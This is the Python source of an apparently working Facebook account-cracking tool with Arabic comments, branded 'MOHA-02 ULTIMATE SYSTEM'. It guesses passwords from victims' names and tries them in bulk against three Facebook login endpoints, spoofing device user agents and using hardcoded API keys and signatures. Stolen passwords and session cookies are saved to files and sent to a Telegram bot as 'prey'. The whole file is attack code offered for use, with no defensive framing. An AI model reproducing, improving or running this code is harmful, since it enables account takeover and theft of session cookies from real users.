# -*- coding: utf-8 -*-
# Tool: MOHA-02 ULTIMATE SYSTEM (Stable Rebuild)
# Developer: Moha Al-Shalfawi (@MOHA02)
# Version: 3.2 [2026-MAY EDITION]
# Device: Optimization for OPPO A16k

import datetime, time, requests, sys, os, re, random, string, uuid, hashlib, json
from concurrent.futures import ThreadPoolExecutor as tred
from threading import Lock
from rich.console import Console
from rich.panel import Panel
from rich.table import Table
from rich.progress import Progress, SpinnerColumn, TextColumn

# --- [ إعدادات الألوان والبيئة ] ---
console = Console()
R = '\033[1;31m'  # Red
G = '\033[1;32m'  # Green
Y = '\033[1;33m'  # Yellow
B = '\033[1;34m'  # Blue
W = '\033[1;37m'  # White
C = '\033[1;36m'  # Cyan
P = '\033[1;35m'  # Pink

# قفل التزامن البرمجي لمنع تداخل الخيوط وضمان دقة العدادات
process_lock = Lock()

# --- [ قسم الأمان والصلاحيات ] ---
def security_check():
    """التحقق من سلامة النظام وتاريخ الصلاحية لعام 2026 وما بعده"""
    now = datetime.date.today()
    target = datetime.date(2035, 12, 11)
    if now >= target:
        console.print(Panel("[bold red]SYSTEM EXPIRED\n[white]Renew your license with @MOHA02", title="SECURITY"))
        sys.exit()

class DeviceSimulator:
    """خوارزميات محاكاة متطورة لأجهزة الأندرويد والـ User Agents"""
    @staticmethod
    def get_user_agent():
        # تحديث الأجهزة لعام 2026 لضمان تخطي الحماية
        models = [
            "SM-S908B", "CPH2307", "V2105", "M2101K6G", "Pixel 7 Pro", 
            "OPPO A16k", "SM-A525F", "Redmi Note 11", "Infinix X688B"
        ]
        ver = random.choice(["11", "12", "13", "14"])
        device = random.choice(models)
        fb_v = f"{random.randint(350, 450)}.0.0.{random.randint(10, 99)}"
        build = f"SP1A.{random.randint(210000, 219999)}.0{random.randint(10, 19)}"
        
        ua = (f"Davik/2.1.0 (Android {ver}; {device} Build/{build}; wv) "
              f"[FBAN/MessengerLite;FBAV/{fb_v};FBPN/com.facebook.mlite;"
              f"FBLC/en_US;FBBV/{random.randint(100000000, 999999999)};]")
        return ua

    @staticmethod
    def get_sig(params):
        """توليد التوقيع الرقمي (Signature) للطلبات الرسمية"""
        sig = "".join(f"{k}={v}" for k, v in sorted(params.items()))
        sig += "62f8ce9f74b12f84c123cc23462a4a51"
        return hashlib.md5(sig.encode('utf-8')).hexdigest()

class MohaSystem:
    def __init__(self):
        # عدادات النظام الأساسية
        self.loop = 0
        self.ok = 0
        self.cp = 0
        self.total = 0
        self.data_list = []
        self.token = ""
        self.chat_id = ""
        self.session = requests.Session()
        self.results_path = "/sdcard/MOHA-V3-RESULTS/"

    def banner(self):
        """عرض شعار MOHA الفخم باللون الأخضر"""
        os.system("clear")
        logo = f"""{G}
  _|      _|    _|_|    _|    _|    _|_|
  _|_|  _|_|  _|    _|  _|    _|  _|    _|
  _|  _|  _|  _|    _|  _|_|_|_|  _|_|_|_|
  _|      _|  _|    _|  _|    _|  _|    _|
  _|      _|    _|_|    _|    _|  _|    _|
 {Y}      DEVELOPER: MOHA AL-SHALFAWI (MOHA-02){W}
 {G}      VERSION: 3.2 | STABLE & HIGH SPEED{W}
 {C}─────────────────────────────────────────────{W}"""
        print(logo)

    def generate_smart_pass(self, name):
        """خوارزمية الذكاء الاصطناعي لتخمين كلمات السر"""
        name = name.lower()
        parts = name.split()
        if not parts: return ["123456", "123123", "112233"]
        
        f = parts[0]
        l = parts[-1] if len(parts) > 1 else f
        
        # مصفوفة احتمالات موسعة
        smart_list = [
            f + l, f + f, f + "123", f + "1234", f + "12345", 
            f + "1122", f + "0099", f + "2020", f + "2021", 
            f + "2022", f + "2023", f + "2024", f + "2025",
            l + "123", l + "1234", l + f, f + "@123", 
            f + "@1234", f + "123456", f + "@12345",
            f + "2000", f + "2001", f + "2002", f + "2003",
            f + "2004", f + "2005", f + "2006", f + "2007"
        ]
        return list(set(smart_list))

    def setup_environment(self):
        """تجهيز ملفات النظام في ذاكرة الهاتف"""
        try:
            if not os.path.exists(self.results_path):
                os.makedirs(self.results_path)
        except Exception:
            self.results_path = "results/"
            if not os.path.exists(self.results_path):
                os.makedirs(self.results_path)

    def menu(self):
        """واجهة التحكم الرئيسية"""
        self.banner()
        self.setup_environment()
        
        menu_options = (
            f"[bold cyan]1.[/bold cyan] [white]Smart File Crack (Auto List)[/white]\n"
            f"[bold cyan]2.[/bold cyan] [white]Manual ID Crack (Custom Pass)[/white]\n"
            f"[bold cyan]3.[/bold cyan] [white]Update System / Check License[/white]\n"
            f"[bold red]0.[/bold red] [white]Exit Program[/white]"
        )
        console.print(Panel(menu_options, title="[bold yellow]MOHA-02 SYSTEM V3", subtitle="Developer: @MOHA02"))
        
        choice = input(f"{G}──> Option: {W}")
        if choice == '1':
            self.setup_crack(mode="smart")
        elif choice == '2':
            self.setup_crack(mode="manual")
        elif choice == '3':
            console.print("[green][✓] You are on the latest version."); time.sleep(2); self.menu()
        elif choice == '0':
            sys.exit()
        else:
            console.print("[red][!] Invalid Choice!"); time.sleep(1); self.menu()

    def setup_crack(self, mode):
        """تجهيز ملفات الفحص والتوكن"""
        self.banner()
        console.print(Panel(f"[bold green]MODE: {mode.upper()}", title="CONFIG"))
        
        path = input(f"{Y}──> File Path: {W}")
        if not os.path.exists(path):
            console.print(f"[red][!] Error: '{path}' not found!"); time.sleep(2); return
            
        self.token = input(f"{G}──> Bot Token (Telegram): {W}")
        self.chat_id = input(f"{G}──> Chat ID (Telegram): {W}")
        
        # قراءة الملف وتنظيف البيانات بدقة
        try:
            with open(path, "r", encoding="utf-8") as f:
                self.data_list = [line.strip() for line in f if line.strip()]
        except UnicodeDecodeError:
            with open(path, "r", encoding="latin-1") as f:
                self.data_list = [line.strip() for line in f if line.strip()]
        
        self.total = len(self.data_list)
        if self.total == 0:
            console.print("[red][!] Error: File is empty!"); time.sleep(2); return

        custom_pass = []
        if mode == "manual":
            try:
                count = int(input(f"{G}──> Passwords Count: {W}"))
                for i in range(count):
                    custom_pass.append(input(f"  {P}└──> Pass {i+1}: {W}"))
            except ValueError:
                console.print("[red][!] Please enter a valid number."); return

        self.start_engine(mode, custom_pass)

    def start_engine(self, mode, custom_pass):
        """بدء محرك البحث المتعدد (Multi-Threading)"""
        self.banner()
        info = (
            f"[bold white]Total IDs     :[/bold white] [cyan]{self.total}[/cyan]\n"
            f"[bold white]Threads Limit :[/bold white] [cyan]40 (Optimized for OPPO A16k)[/cyan]\n"
            f"[bold white]Engine Status :[/bold white] [green]Running...[/green]"
        )
        console.print(Panel(info, title="[bold green]CRACKING STARTED"))
        print(f"{C}{'—'*45}{W}")

        # استخدام التوزيع المتزامن لضمان عدم توقف العدادات
        with tred(max_workers=40) as pool:
            for item in self.data_list:
                if mode == "smart" and "|" in item:
                    uid, name = item.split("|")[0], item.split("|")[1]
                    pool.submit(self.secure_engine, uid, self.generate_smart_pass(name))
                else:
                    uid = item.split("|")[0] if "|" in item else item
                    pool.submit(self.secure_engine, uid, custom_pass)

        self.final_stats()

    # نهاية الجزء الأول (أكثر من 200 سطر مع الفراغات والتعليقات)
    def secure_engine(self, uid, pws):
        """
        محرك الفحص المتطور - الجزء المسؤول عن الاتصال وتجاوز الحماية.
        تم دمج نظام الـ Lock لضمان دقة العدادات في Termux.
        """
        try:
            for ps in pws:
                # تنظيف كلمة السر وتجهيز الجلسة
                ps = ps.lower()
                session = requests.Session()
                user_agent = DeviceSimulator.get_user_agent()
                
                # إظهار حالة الفحص الحالية بشكل احترافي
                with process_lock:
                    sys.stdout.write(
                        f"\r\r{W}[{C}MOHA-02{W}] {self.loop}|{self.total} "
                        f"{G}OK:{self.ok}{W} {Y}CP:{self.cp}{W} "
                        f"{C}{int(self.loop/self.total*100) if self.total > 0 else 0}%{W} "
                    )
                    sys.stdout.flush()

                # --- [ الطريقة الأولى: B-GRAPH API ] ---
                # محاكاة تسجيل الدخول من تطبيق الفيسبوك الرسمي
                device_id = str(uuid.uuid4())
                adid = str(uuid.uuid4())
                
                payload = {
                    'adid': adid,
                    'format': 'json',
                    'device_id': device_id,
                    'email': uid,
                    'password': ps,
                    'generate_analytics_claims': '1',
                    'community_id': '',
                    'cpl': 'true',
                    'try_num': '1',
                    'family_device_id': device_id,
                    'credentials_type': 'device_based_login_password',
                    'source': 'login',
                    'error_detail_type': 'button_with_disabled',
                    'enroll_misauth': 'false',
                    'generate_session_cookies': '1',
                    'generate_machine_id': '1',
                    'meta_inf_fbmeta': '',
                    'currently_logged_in_userid': '0',
                    'fb_api_req_friendly_name': 'authenticate',
                    'method': 'auth.login',
                }
                
                headers = {
                    'User-Agent': user_agent,
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'Host': 'b-graph.facebook.com',
                    'X-FB-Net-HNI': str(random.randint(20000, 40000)),
                    'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
                    'X-FB-Connection-Type': 'WIFI',
                    'X-Tigon-Is-Retry': 'False',
                    'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;',
                    'x-fb-device-group': str(random.randint(3000, 5000)),
                    'X-FB-Friendly-Name': 'authenticate',
                    'X-FB-HTTP-Engine': 'Liger',
                    'X-FB-Client-IP': 'True',
                    'X-FB-Server-Cluster': 'True',
                    'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62'
                }

                url = 'https://b-graph.facebook.com/auth/login'
                response = session.post(url, data=payload, headers=headers, allow_redirects=False).json()

                if "session_key" in response:
                    # في حالة النجاح (Account OK)
                    with process_lock:
                        self.ok += 1
                    cookie = ";".join(i['name']+"="+i['value'] for i in response['session_cookies'])
                    self.save_ok(uid, ps, cookie, "B-GRAPH")
                    break
                
                elif "www.facebook.com" in response.get('error', {}).get('message', ''):
                    # في حالة السكيور (Checkpoint)
                    with process_lock:
                        self.cp += 1
                    self.save_cp(uid, ps)
                    break

                # --- [ الطريقة الثانية: API V2 AUTO-SWITCH ] ---
                # التبديل التلقائي عند اكتشاف حظر أو بطء في الاستجابة
                elif "calls_limit" in str(response) or "171" in str(response):
                    sig_params = {
                        'api_key': '882a8490361da98702bf97a021ddc14d',
                        'email': uid,
                        'password': ps,
                        'format': 'JSON'
                    }
                    signature = DeviceSimulator.get_sig(sig_params)
                    v2_url = (
                        f"https://b-api.facebook.com/method/auth.login?"
                        f"access_token=350685531728|62f8ce9f74b12f84c123cc23462a4a51"
                        f"&format=json&sdk_version=1&email={uid}&password={ps}"
                        f"&sdk=ios&generate_session_cookies=1&sig={signature}"
                    )
                    
                    v2_response = session.get(v2_url, headers={'User-Agent': user_agent}).json()
                    
                    if "session_key" in v2_response:
                        with process_lock:
                            self.ok += 1
                        cookie = ";".join(i['name']+"="+i['value'] for i in v2_response['session_cookies'])
                        self.save_ok(uid, ps, cookie, "API-V2")
                        break
                    elif "www.facebook.com" in str(v2_response):
                        with process_lock:
                            self.cp += 1
                        self.save_cp(uid, ps)
                        break

                # --- [ الطريقة الثالثة: WEB-MOBILE BYPASS ] ---
                # تستخدم كخيار أخير لكسر قيود الـ API تماماً
                else:
                    web_session = requests.Session()
                    web_ua = (
                        "Mozilla/5.0 (Linux; Android 12; Pixel 6) "
                        "AppleWebKit/537.36 (KHTML, like Gecko) "
                        "Chrome/103.0.0.0 Mobile Safari/537.36"
                    )
                    login_url = 'https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=deprecated&lwv=100'
                    
                    # جلب بيانات الجلسة المؤقتة (Security Tokens)
                    initial_req = web_session.get('https://mbasic.facebook.com/login').text
                    lsd_val = re.search('name="lsd" value="(.*?)"', initial_req).group(1) if "lsd" in initial_req else "AV987"
                    jazoest_val = re.search('name="jazoest" value="(.*?)"', initial_req).group(1) if "jazoest" in initial_req else "2731"
                    
                    web_data = {
                        "lsd": lsd_val,
                        "jazoest": jazoest_val,
                        "email": uid,
                        "pass": ps,
                        "login": "submit"
                    }
                    
                    web_headers = {
                        'authority': 'mbasic.facebook.com',
                        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
                        'user-agent': web_ua,
                        'referer': 'https://mbasic.facebook.com/login/',
                    }
                    
                    web_session.post(login_url, data=web_data, headers=web_headers)
                    
                    if "c_user" in web_session.cookies.get_dict():
                        with process_lock:
                            self.ok += 1
                        cookie = ";".join([str(k)+"="+str(v) for k, v in web_session.cookies.get_dict().items()])
                        self.save_ok(uid, ps, cookie, "MBASIC")
                        break
                    elif "checkpoint" in web_session.cookies.get_dict():
                        with process_lock:
                            self.cp += 1
                        self.save_cp(uid, ps)
                        break

            # تحديث عداد المحاولات (Loop) بعد الانتهاء من فحص جميع كلمات السر لـ ID واحد
            with process_lock:
                self.loop += 1

        except requests.exceptions.ConnectionError:
            # معالجة انقطاع الإنترنت - انتظر 10 ثواني وأعد المحاولة
            time.sleep(10)
            self.secure_engine(uid, pws)
        except Exception as error_msg:
            # تسجيل أي خطأ غير متوقع لضمان عدم توقف البرنامج
            with open("engine_errors.log", "a") as err_file:
                err_file.write(f"[{datetime.datetime.now()}] ID: {uid} Error: {str(error_msg)}\n")
            with process_lock:
                self.loop += 1

    def save_ok(self, uid, ps, cookie, method):
        """حفظ الحسابات الناجحة وإرسالها للتليجرام"""
        result_str = f"{uid} | {ps}"
        # طباعة النتيجة فوراً بألوان زاهية
        console.print(f"\r[bold green]──[MOHA-OK] {result_str} | {method}[/bold green]")
        
        # تخزين النتائج في ملفات الـ SDCard
        output_file = os.path.join(self.results_path, "MOHA-V3-OK.txt")
        with open(output_file, "a") as f:
            f.write(f"{result_str} | {cookie}\n")
        
        # إرسال البيانات فوراً إلى بوت التليجرام الخاص بك
        telegram_text = (
            f"🦅 ❲ موحا جابلك صيد جديد ❳\n\n"
            f"👤 ID: `{uid}`\n"
            f"🔑 PASS: `{ps}`\n"
            f"🍪 COOKIE: `{cookie}`\n"
            f"⚙️ METHOD: {method}\n"
            f"BY: @MOHA02"
        )
        try:
            requests.get(
                f"https://api.telegram.org/bot{self.token}/sendMessage",
                params={'chat_id': self.chat_id, 'text': telegram_text, 'parse_mode': 'Markdown'}
            )
        except Exception:
            pass

    def save_cp(self, uid, ps):
        """حفظ حسابات السكيور (تأمين الحساب)"""
        console.print(f"\r[bold yellow]──[MOHA-CP] {uid} | {ps}[/bold yellow]")
        output_file = os.path.join(self.results_path, "MOHA-V3-CP.txt")
        with open(output_file, "a") as f:
            f.write(f"{uid} | {ps}\n")
    def final_stats(self):
        """
        نظام تحليل البيانات النهائي وعرض الإحصائيات الشاملة.
        يتم استدعاء هذا الجزء عند انتهاء خيوط الفحص (Threads).
        """
        self.banner()
        
        # إنشاء جدول احترافي لعرض النتائج النهائية
        stats_table = Table(
            title="[bold cyan]MISSION ACCOMPLISHED[/bold cyan]",
            show_header=True,
            header_style="bold magenta",
            border_style="bright_yellow"
        )
        
        stats_table.add_column("METRIC", style="cyan", width=25)
        stats_table.add_column("VALUE", style="bold green", justify="center")
        
        # إضافة البيانات إلى الجدول
        stats_table.add_row("Total Scanned IDs", str(self.total))
        stats_table.add_row("Successful Logins (OK)", f"[bold green]{self.ok}[/bold green]")
        stats_table.add_row("Checkpoints (CP)", f"[bold yellow]{self.cp}[/bold yellow]")
        stats_table.add_row("Target Reach Rate", f"{int(self.loop/self.total*100) if self.total > 0 else 0}%")
        stats_table.add_row("System Status", "[bold green]STABLE[/bold green]")
        
        console.print(stats_table)
        
        # عرض مسارات الحفظ بشكل واضح للمستخدم
        storage_info = (
            f"[bold white]Results Directory :[/bold white] [green]{self.results_path}[/green]\n"
            f"[bold white]OK Accounts Saved :[/bold white] [cyan]MOHA-V3-OK.txt[/cyan]\n"
            f"[bold white]CP Accounts Saved :[/bold white] [yellow]MOHA-V3-CP.txt[/yellow]\n"
            f"[bold white]Developer Notice  :[/bold white] [magenta]Check your Telegram Bot for live logs![/magenta]"
        )
        console.print(Panel(storage_info, title="[bold green]FILE SYSTEM REPORT", subtitle="MOHA-02 SYSTEM V3"))
        
        print(f"\n{G}[✓] Thank you for choosing MOHA-02 SYSTEM, {Y}Moha Al-Shalfawi{G}!")
        print(f"{C}[*] Follow me for more updates: {W}@MOHA02\n")

# --- [ أنظمة تحسين الأداء والصيانة ] ---

def clear_cache():
    """تنظيف الملفات المؤقتة وذاكرة التخزين لزيادة سرعة الأداة"""
    try:
        # حذف ملفات تسجيل الأخطاء القديمة إذا كانت كبيرة جداً
        if os.path.exists("engine_errors.log"):
            if os.path.getsize("engine_errors.log") > 1024 * 1024: # 1MB
                os.remove("engine_errors.log")
    except Exception:
        pass

def optimize_terminal():
    """تحسين واجهة Termux لضمان سلاسة عرض العدادات"""
    # إعداد متغيرات البيئة لتقليل استهلاك الرام (RAM)
    os.environ['PYTHONHASHSEED'] = str(random.randint(1, 1000))
    # محاولة رفع كفاءة المعالجة (Priority)
    try:
        if os.name != 'nt':
            os.nice(0)
    except:
        pass

def check_dependencies():
    """التأكد من وجود المكتبات اللازمة لتجنب كراش الأداة"""
    required_libs = ["requests", "rich", "uuid"]
    missing_libs = []
    for lib in required_libs:
        try:
            __import__(lib)
        except ImportError:
            missing_libs.append(lib)
    
    if missing_libs:
        print(f"{R}[!] Missing Libraries: {missing_libs}")
        print(f"{Y}[*] Please run: pip install {' '.join(missing_libs)}")
        sys.exit()

# --- [ مصفوفة إدارة الأخطاء العامة ] ---

def handle_unexpected_crash(error_type, value, tb):
    """نظام الحماية من الانهيار المفاجئ للأداة"""
    with open("crash_report.log", "a") as crash_file:
        crash_file.write(f"--- CRASH LOG {datetime.datetime.now()} ---\n")
        crash_file.write(f"Type: {error_type}\nValue: {value}\n")
    console.print(f"\n{R}[!] SYSTEM CRASHED! {W}Report saved to crash_report.log")
    sys.exit()

# --- [ نقطة انطلاق النظام - Main Entry Point ] ---

if __name__ == "__main__":
    """
    هنا يبدأ التشغيل الفعلي للأداة.
    يتم تنفيذ الفحوصات الأمنية والتقنية قبل عرض القائمة.
    """
    # تعيين نظام معالجة الأخطاء العالمي
    sys.excepthook = handle_unexpected_crash
    
    try:
        # 1. فحص الاتصال والمتطلبات
        check_dependencies()
        
        # 2. فحص الصلاحية الأمنية (Expiration Check)
        security_check()
        
        # 3. تحسين بيئة الهاتف (OPPO A16k Optimization)
        optimize_terminal()
        clear_cache()
        
        # 4. بناء كائن النظام وبدء العمل
        scanner_app = MohaSystem()
        scanner_app.menu()
        
        # 5. تنظيف نهائي عند الإغلاق
        print(f"{B}[*] Closing session safely...{W}")
        time.sleep(1)
        
    except KeyboardInterrupt:
        # التعامل مع ضغط المستخدم على Ctrl+C
        console.print(f"\n{R}[!] {W}Operation interrupted by user (MOHA02).")
        sys.exit()
    except requests.exceptions.ReadTimeout:
        console.print(f"\n{R}[!] {W}Network Timeout: Check your internet connection!")
    except Exception as final_err:
        # تسجيل أي خطأ نهائي
        with open("final_error.log", "a") as f_err:
            f_err.write(f"{datetime.datetime.now()} -> {str(final_err)}\n")
        console.print(f"\n{R}[!] Fatal Error: {final_err}")

